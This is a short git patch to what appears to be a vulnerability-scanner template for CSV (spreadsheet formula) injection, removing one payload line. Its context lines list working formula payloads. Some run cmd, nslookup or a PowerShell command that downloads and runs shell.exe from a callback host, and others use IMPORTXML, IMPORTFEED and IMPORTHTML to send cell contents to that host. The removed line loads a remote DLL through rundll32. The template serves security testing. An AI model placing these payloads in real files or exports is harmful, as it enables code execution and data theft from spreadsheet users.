From 8adbcc33754de6c3cb8d612a3e111ec8a6439e66 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 16:33:34 +0530 Subject: [PATCH] minor update --- dast/vulnerabilities/csv-injection.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/csv-injection.yaml index ef78742b57..318d38f438 100644 --- a/dast/vulnerabilities/csv-injection.yaml +++ b/dast/vulnerabilities/csv-injection.yaml @@ -22,7 +22,6 @@ http: - "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0" - "=cmd|' /C nslookup{{interactsh-url}}'!'A1'" - "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0" - - "=cmd|'/c rundll32.exe \\{{interactsh-url}}\3\2\1.dll,0'!_xlbgnm.A1" - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)'